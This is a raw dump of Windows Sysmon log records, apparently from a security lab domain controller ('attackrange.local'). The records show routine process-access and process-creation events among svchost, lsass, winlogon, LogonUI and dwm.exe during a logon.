13:29:53.467{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0605-000000009A01}4632C:\Windows\system32\dwm.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009451Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.420{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009450Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.420{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009449Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.420{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009448Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.420{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009447Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009446Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.420{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009445Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009444Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009443Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009442Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009441Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009440Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009439Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009438Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009437Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009436Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009435Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.404{08A6967A-4750-6000-0205-000000009A01}47883304C:\Windows\system32\csrss.exe{08A6967A-4751-6000-0605-000000009A01}4632C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009434Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.404{08A6967A-4750-6000-0305-000000009A01}50723040C:\Windows\system32\winlogon.exe{08A6967A-4751-6000-0605-000000009A01}4632C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\dwminit.dll+2d11|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009433Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.419{08A6967A-4751-6000-0605-000000009A01}4632C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window Manager\DWM-2{08A6967A-4751-6000-9C13-2C0000000000}0x2c139c2SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000009432Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.404{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1c030|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009431Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.404{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009430Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.404{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009429Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.389{08A6967A-4288-6000-1000-000000009A01}11362164C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009428Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.389{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009427Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.389{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009426Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.389{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 